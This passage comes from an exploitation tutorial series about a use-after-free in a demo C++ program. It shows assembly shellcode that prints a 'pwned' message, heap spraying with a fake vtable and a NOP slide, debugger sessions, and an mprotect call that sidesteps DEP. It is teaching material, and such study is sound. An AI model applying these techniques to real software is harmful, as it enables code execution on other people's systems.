So far, we haven’t injected any code (that we would control) into the program but used a routine already contained in the program. As I have mentioned, this is normally not a realistic scenario. So we will now ditch the routine and see how we can inject our own code.
First off, the injected code must of course be self-contained and position-independent, that is it must be able to run from any location in memory and must not rely on anything other than system calls. This type of code is usually known as shellcode. The shellcode we will use looks like this:
Listing 2. Our shellcode
.code32
jmp l_data
l_code:
mov ebx, 2 # file descriptor, 2 = stderr
pop ecx # pointer to buffer
mov edx, 30 # buffer size
mov eax, 4 # system call number, 4 = write
int 0x80 # invoke system call
ret
l_data:
call l_code # call to push the string's address onto the stack
.asciz "\x1b[31mYou've been pwned!!!\x1b[0m\n"
The term shellcode is actually a bit misleading here as we don’t start a shell but just print a string. As you can see, the code is quite simple. First, it performs the JMP-CALL-POP trick to get the address of the string we want to print on the stack, then it invokes the write
system call and returns (because it will be called as a method via the vtable). I translated the code into a raw binary (just the code, no headers and other stuff) using GNU as
and objdump
so that the Python script that performs the exploit can use it.
So how are we going to deliver this code to the victim program? We will use another chunk for that. But we need to find again a way to use a fixed start address (that we will put into the vtable), despite the start address of the chunk’s buffer being random. As you might have guessed, the heap spraying, described in the previous step, comes to the rescue once more. But instead of putting lots of copies of our code into the chunk (as we did with the vtable), we will use a technique known as NOP slide (or NOP sled). You might be familiar with this technique if you know a bit about classical stack overflows. What it means is that we will create a large chunk (again 100MB), fill it almost completely with NOP instructions and put our shellcode at the very end of it. Then we will use an address that is guaranteed to be included in the chunk’s buffer as pointer to our code and put that address in our fake vtable. This address will definitely point to a NOP and when the CPU finally jumps to it, program execution will "slide" down the NOPs until it reaches the shellcode. Note that we don’t care about null bytes in the shellcode as we don’t deliver it as string but as base64-encoded data.
In the following debugger session we will take a closer look at this fourth chunk containing the code.
Listing 3. Demo of the code injection
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177 delete p_chunk;
pwndbg> x/3dx p_chunk
0x8effc40: 0xe2000000 0x78787878 0x78787878 (1)
pwndbg> x/8dx 0xe2000000
0xe2000000: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000 (2)
0xe2000010: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000
pwndbg> x/8bx 0xdbc00000
0xdbc00000: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
pwndbg> x/8i 0xdbc00000
0xdbc00000: nop (3)
0xdbc00001: nop
0xdbc00002: nop
0xdbc00003: nop
0xdbc00004: nop
0xdbc00005: nop
0xdbc00006: nop
0xdbc00007: nop
pwndbg> x/12i (0xd9b52010 + 0x6400000 - 60)
0xdff51fd4: nop
0xdff51fd5: nop
0xdff51fd6: nop
0xdff51fd7: jmp 0xdff51fec (4)
0xdff51fd9: mov ebx,0x1
0xdff51fde: pop ecx
0xdff51fdf: mov edx,0x1e
0xdff51fe4: mov eax,0x4
0xdff51fe9: int 0x80
0xdff51feb: ret
0xdff51fec: call 0xdff51fd9
0xdff51ff1: sbb ebx,DWORD PTR [ebx+0x33]
pwndbg> x/1s 0xdff51ff1
0xdff51ff1: "\033[31mYou've been pwned!!!\033[0m\n" (5)
But before we do that we note that our overwritten object still contains a pointer to the chunk containing our fake vtables (1), although with a different value than before (0xe2000000 instead of 0xe9000000). And of course the vtable looks different now as well. It contains pointers with the value 0xdbc00000 (2). So what is there at this address? If we display the memory as instruction (3) we see lots of NOPs. So it seems the address is somewhere located in the buffer for the decoded fourth chunk, in the NOP slide. If we examine the end of this buffer (0xd9b52010 is the start address of the buffer, conveniently printed out by the program) we find our shellcode (4) together with the string it prints (5).
I arrived at these two addresses (0xe2000000 and 0xdbc00000) again by running the program a few times and choosing values that were always included in the respective buffers. Interestingly, the buffer for the fourth chunk was always located 100MB below the buffer for the third chunk. The following diagram shows the locations of the chunk’s buffers in memory and their relation (what points to what).
Figure 2. Location of the chunk buffers in memory and their relation
So when the destructor is finally called on the overwritten object, via the pointer in the vtable, the CPU will jump right into the NOP slide, execute all the NOPs until it reaches the shellcode and then the shellcode itself.
Except… it doesn’t, not yet at least. Instead, the program terminates with a segmentation fault. Why is that? Another security measure employed by modern CPUs and operating systems keeps us from succeeding. It is commonly known as data execution prevention (DEP) or W^X and means that any memory regions that are writeable by a program (on the heap or stack) are by default not executable (implemented via the NX bit). As the chunk’s buffer is of course writeable, the CPU will not execute the code in it but generate an exception which leads in turn to the segmentation fault.
So how can we get around this security measure? In the third part of this series I will show you a very clever technique that works by not injecting code into the program but something else. But for now, we will just play a bit unfair and change the permissions of the chunk’s buffer. This can be done very easily in the debugger as you can see below.
Listing 4. Changing the permissions of the chunk’s buffer
pwndbg> vmmap 0xd9b52010 (1)
Start End Perm Size Offset File
0xd9b52000 0xf6e00000 rw-p 1d2ae000 0 [anon_d9b52] +0x0
pwndbg> call (long) mprotect(0xd9b52000, 0x1d2ae000, 0x7) (2)
$4 = 0
First I use the vmmap
command (provided by the pwndbg extension) to check the permissions of the buffer (1) and you can see that it’s indeed not executable (it misses the "x" bit). Then I call the mprotect
system call (2) to change the permissions (I don’t use the start address and size of the buffer but of the complete memory mapping, 0x7 means "rwx"). After that the exploit actually works.
This is the end of the second article in this series. As I already said we will defeat W^X in the third article. Stay tuned if you liked it so far…